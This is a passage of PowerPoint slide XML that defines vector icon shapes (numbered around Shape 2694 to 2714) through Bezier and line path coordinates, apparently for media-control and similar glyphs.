                  <a:pt x="8836" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8565" y="8836"/>
                  <a:pt x="8345" y="9056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4" name="Shape 2694"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10009878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3"/>
                  <a:pt x="13721" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2970" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3001" y="14083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59"/>
                  <a:pt x="5231" y="0"/>
                  <a:pt x="4418" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3605" y="0"/>
                  <a:pt x="2945" y="659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7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7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5" name="Shape 2695"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10543139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7"/>
                  <a:pt x="15490" y="14727"/>
                  <a:pt x="15218" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14947" y="14727"/>
                  <a:pt x="14727" y="14947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4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7"/>
                  <a:pt x="8023" y="14236"/>
                  <a:pt x="8836" y="14236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9072" y="14236"/>
                  <a:pt x="9293" y="14175"/>
                  <a:pt x="9491" y="14076"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8925" y="14938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="14741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1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6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8"/>
                  <a:pt x="14727" y="14275"/>
                  <a:pt x="14727" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="11536"/>
                  <a:pt x="14351" y="10398"/>
                  <a:pt x="13709" y="9453"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14764" y="7851"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15288" y="7832"/>
                  <a:pt x="15709" y="7402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6" name="Shape 2696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11076400" y="180311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7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7"/>
                  <a:pt x="10529" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11071" y="14727"/>
                  <a:pt x="11291" y="14507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7"/>
                  <a:pt x="18384" y="14727"/>
                  <a:pt x="18655" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18926" y="14727"/>
                  <a:pt x="19145" y="14507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7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7" name="Shape 2697"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6289746" y="2336379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8" name="Shape 2698"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6823008" y="2336379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4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4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699" name="Shape 2699"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7343572" y="2361772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1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19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2" y="21600"/>
                  <a:pt x="17182" y="21332"/>
                  <a:pt x="17182" y="21000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17182" y="20851"/>
                  <a:pt x="17133" y="20719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69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1" y="16800"/>
                  <a:pt x="16691" y="17068"/>
                  <a:pt x="16691" y="17400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="17732"/>
                  <a:pt x="16911" y="18000"/>
                  <a:pt x="17182" y="18000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21109" y="18000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21380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0" name="Shape 2700"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876833" y="233637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8"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15472" y="12512"/>
                  <a:pt x="15709" y="11684"/>
                  <a:pt x="15709" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="9192"/>
                  <a:pt x="14932" y="7768"/>
                  <a:pt x="13737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8" y="20554"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4800" y="20010"/>
                  <a:pt x="982" y="15853"/>
                  <a:pt x="982" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="9010"/>
                  <a:pt x="1468" y="7337"/>
                  <a:pt x="2305" y="5892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8" y="20554"/>
                  <a:pt x="9708" y="20554"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7315" y="12607"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7034" y="12065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60" y="12694"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7364" y="12691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7364" y="12691"/>
                  <a:pt x="7315" y="12607"/>
                  <a:pt x="7315" y="12607"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10800" y="982"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14432" y="982"/>
                  <a:pt x="17596" y="2959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6"/>
                  <a:pt x="5930" y="10207"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2909" y="4975"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4697" y="2557"/>
                  <a:pt x="7561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1" name="Shape 2701"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8410094" y="2406211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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17582" y="15100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17582" y="8844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16724" y="8844"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16724" y="8844"/>
                  <a:pt x="16724" y="15100"/>
                  <a:pt x="16724" y="15100"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13336" y="15100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14199" y="15100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0"/>
                  <a:pt x="13336" y="15100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1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5673" y="15121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5350" y="11399"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5276" y="10527"/>
                  <a:pt x="5214" y="9718"/>
                  <a:pt x="5169" y="8730"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5157" y="8730"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5090" y="9705"/>
                  <a:pt x="5028" y="10527"/>
                  <a:pt x="4937" y="11399"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4574" y="15121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3629" y="15121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723" y="6471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3646" y="6471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3935" y="10039"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4020" y="11066"/>
                  <a:pt x="4099" y="12182"/>
                  <a:pt x="4161" y="13055"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4172" y="13055"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4235" y="12118"/>
                  <a:pt x="4325" y="11078"/>
                  <a:pt x="4422" y="10013"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4744" y="6471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5662" y="6471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5967" y="10117"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6052" y="11130"/>
                  <a:pt x="6114" y="12054"/>
                  <a:pt x="6171" y="13017"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6182" y="13017"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6239" y="12054"/>
                  <a:pt x="6324" y="11040"/>
                  <a:pt x="6403" y="10013"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6715" y="6471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7592" y="6471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7592" y="6471"/>
                  <a:pt x="6607" y="15121"/>
                  <a:pt x="6607" y="15121"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8940" y="15121"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8080" y="15121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1"/>
                  <a:pt x="8940" y="15121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6"/>
                  <a:pt x="8505" y="8076"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8233" y="8076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2" name="Shape 2702"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8943355" y="2349075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09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3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4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89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3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1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3" name="Shape 2703"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9489313" y="2336379"/>
            <a:ext cx="253935" cy="2796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8"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16200" y="6386"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="6115"/>
                  <a:pt x="15958" y="5896"/>
                  <a:pt x="15660" y="5896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15362" y="5896"/>
                  <a:pt x="15120" y="6115"/>
                  <a:pt x="15120" y="6386"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15120" y="8348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8"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18059" y="13289"/>
                  <a:pt x="15906" y="14245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8"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11096" y="15678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1"/>
                  <a:pt x="8520" y="8577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3"/>
                  <a:pt x="11771" y="13665"/>
                  <a:pt x="11736" y="14669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11418" y="14686"/>
                  <a:pt x="11097" y="14697"/>
                  <a:pt x="10766" y="14697"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6636" y="14697"/>
                  <a:pt x="3478" y="13292"/>
                  <a:pt x="3447" y="13278"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2965" y="14155"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3102" y="14218"/>
                  <a:pt x="6369" y="15678"/>
                  <a:pt x="10766" y="15678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90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1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3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8"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6480" y="6386"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6480" y="6115"/>
                  <a:pt x="6238" y="5896"/>
                  <a:pt x="5940" y="5896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5642" y="5896"/>
                  <a:pt x="5400" y="6115"/>
                  <a:pt x="5400" y="6386"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5400" y="8348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4" name="Shape 2704"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10009878" y="2336379"/>
            <a:ext cx="279328" cy="279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5628" y="4904"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14334" y="4904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10776" y="9842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7337" y="4904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975" y="4904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10094" y="10618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5736" y="16696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7030" y="16696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10776" y="11493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14470" y="16696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15866" y="16696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11474" y="10651"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11474" y="10651"/>
                  <a:pt x="15628" y="4904"/>
                  <a:pt x="15628" y="490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5" name="Shape 2705"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10543138" y="2336379"/>
            <a:ext cx="279260" cy="27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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7853" y="2877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7853" y="8838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="8838"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="8838"/>
                  <a:pt x="982" y="3820"/>
                  <a:pt x="982" y="3820"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="9819"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8835" y="9819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9"/>
                  <a:pt x="0" y="9819"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="8838"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11771" y="8838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11771" y="2339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="1125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="1125"/>
                  <a:pt x="20618" y="8838"/>
                  <a:pt x="20618" y="8838"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10789" y="1484"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10789" y="9819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="9819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3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7853" y="12763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7853" y="18722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="17780"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="17780"/>
                  <a:pt x="982" y="12763"/>
                  <a:pt x="982" y="12763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2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="11782"/>
                  <a:pt x="0" y="18635"/>
                  <a:pt x="0" y="18635"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11771" y="12763"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20618" y="12763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="20475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11771" y="19261"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11771" y="19261"/>
                  <a:pt x="11771" y="12763"/>
                  <a:pt x="11771" y="12763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2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10789" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10789" y="11782"/>
                  <a:pt x="10789" y="20116"/>
                  <a:pt x="10789" y="201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6" name="Shape 2706"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11114490" y="2336379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6"/>
                  <a:pt x="19948" y="14236"/>
                  <a:pt x="19575" y="14236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19202" y="14236"/>
                  <a:pt x="18900" y="14016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6"/>
                  <a:pt x="2398" y="14236"/>
                  <a:pt x="2025" y="14236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1652" y="14236"/>
                  <a:pt x="1350" y="14016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2"/>
                  <a:pt x="16200" y="491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="220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19"/>
                  <a:pt x="11905" y="982"/>
                  <a:pt x="10800" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9695" y="982"/>
                  <a:pt x="8644" y="1119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0"/>
                  <a:pt x="5400" y="491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="592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6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6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6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6"/>
                  <a:pt x="9148" y="3436"/>
                  <a:pt x="8775" y="34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8" name="Shape 2708"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859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888"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="7712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14241" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14241" y="10800"/>
                  <a:pt x="8836" y="13888"/>
                  <a:pt x="8836" y="13888"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15520" y="10422"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15525" y="10416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15438" y="10367"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15425" y="10361"/>
                  <a:pt x="15414" y="10351"/>
                  <a:pt x="15401" y="10346"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8652" y="6489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8647" y="6495"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8563" y="6428"/>
                  <a:pt x="8461" y="6382"/>
                  <a:pt x="8345" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8075" y="6382"/>
                  <a:pt x="7855" y="6601"/>
                  <a:pt x="7855" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7855" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="14999"/>
                  <a:pt x="8075" y="15218"/>
                  <a:pt x="8345" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8461" y="15218"/>
                  <a:pt x="8563" y="15172"/>
                  <a:pt x="8647" y="15105"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8652" y="15111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15401" y="11254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15414" y="11249"/>
                  <a:pt x="15425" y="11240"/>
                  <a:pt x="15438" y="11233"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15525" y="11184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15520" y="11178"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15632" y="11088"/>
                  <a:pt x="15709" y="10955"/>
                  <a:pt x="15709" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="10645"/>
                  <a:pt x="15632" y="10512"/>
                  <a:pt x="15520" y="104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09" name="Shape 2709"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120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12764" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764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12273" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12002" y="6873"/>
                  <a:pt x="11782" y="7092"/>
                  <a:pt x="11782" y="7364"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11782" y="14236"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="14508"/>
                  <a:pt x="12002" y="14727"/>
                  <a:pt x="12273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8836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8836" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="7855"/>
                  <a:pt x="8836" y="13745"/>
                  <a:pt x="8836" y="13745"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9327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9327" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9598" y="14727"/>
                  <a:pt x="9818" y="14508"/>
                  <a:pt x="9818" y="14236"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9818" y="7364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="7092"/>
                  <a:pt x="9598" y="6873"/>
                  <a:pt x="9327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0" name="Shape 2710"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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3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3" y="14727"/>
                  <a:pt x="7364" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14236" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14507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7" y="6873"/>
                  <a:pt x="14236" y="6873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1" name="Shape 2711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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800" y="13745"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9173" y="13745"/>
                  <a:pt x="7855" y="12427"/>
                  <a:pt x="7855" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="9173"/>
                  <a:pt x="9173" y="7855"/>
                  <a:pt x="10800" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12427" y="7855"/>
                  <a:pt x="13745" y="9173"/>
                  <a:pt x="13745" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="12427"/>
                  <a:pt x="12427" y="13745"/>
                  <a:pt x="10800" y="13745"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="6873"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8631" y="6873"/>
                  <a:pt x="6873" y="8631"/>
                  <a:pt x="6873" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="12969"/>
                  <a:pt x="8631" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12969" y="14727"/>
                  <a:pt x="14727" y="12969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2" name="Shape 2712"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903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888"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10800" y="7712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16204" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16204" y="10800"/>
                  <a:pt x="10800" y="13888"/>
                  <a:pt x="10800" y="13888"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17484" y="10422"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17489" y="10416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17402" y="10367"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17389" y="10361"/>
                  <a:pt x="17378" y="10351"/>
                  <a:pt x="17365" y="10346"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10616" y="6489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10611" y="6495"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10527" y="6428"/>
                  <a:pt x="10425" y="6382"/>
                  <a:pt x="10309" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10038" y="6382"/>
                  <a:pt x="9818" y="6601"/>
                  <a:pt x="9818" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9818" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="14999"/>
                  <a:pt x="10038" y="15218"/>
                  <a:pt x="10309" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10425" y="15218"/>
                  <a:pt x="10527" y="15172"/>
                  <a:pt x="10611" y="15105"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10616" y="15111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17365" y="11254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17378" y="11249"/>
                  <a:pt x="17388" y="11239"/>
                  <a:pt x="17401" y="11233"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17489" y="11184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17484" y="11178"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17596" y="11088"/>
                  <a:pt x="17673" y="10955"/>
                  <a:pt x="17673" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="10645"/>
                  <a:pt x="17596" y="10512"/>
                  <a:pt x="17484" y="10422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6684" y="6495"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6600" y="6428"/>
                  <a:pt x="6498" y="6382"/>
                  <a:pt x="6382" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6111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1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8836" y="13883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="12766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6873" y="13888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6873" y="7712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="8834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="7716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6689" y="6489"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6689" y="6489"/>
                  <a:pt x="6684" y="6495"/>
                  <a:pt x="6684" y="649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3" name="Shape 2713"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164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4236"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13745" y="14236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13745" y="7364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14727" y="7364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="7364"/>
                  <a:pt x="14727" y="14236"/>
                  <a:pt x="14727" y="14236"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6873" y="13888"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6873" y="7712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12277" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12277" y="10800"/>
                  <a:pt x="6873" y="13888"/>
                  <a:pt x="6873" y="13888"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15218" y="6382"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="6382"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12983" y="6382"/>
                  <a:pt x="12764" y="6601"/>
                  <a:pt x="12764" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12764" y="9961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6689" y="6489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6684" y="6495"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6600" y="6428"/>
                  <a:pt x="6498" y="6382"/>
                  <a:pt x="6382" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6110" y="6382"/>
                  <a:pt x="5891" y="6601"/>
                  <a:pt x="5891" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5891" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="14999"/>
                  <a:pt x="6110" y="15218"/>
                  <a:pt x="6382" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6498" y="15218"/>
                  <a:pt x="6600" y="15172"/>
                  <a:pt x="6684" y="15105"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6689" y="15111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="11639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="14999"/>
                  <a:pt x="12983" y="15218"/>
                  <a:pt x="13255" y="15218"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15218" y="15218"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15490" y="15218"/>
                  <a:pt x="15709" y="14999"/>
                  <a:pt x="15709" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="6601"/>
                  <a:pt x="15490" y="6382"/>
                  <a:pt x="15218" y="6382"/>
                </a:cubicBezTo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4" name="Shape 2714"/>
          <p:cNvSpPr/>
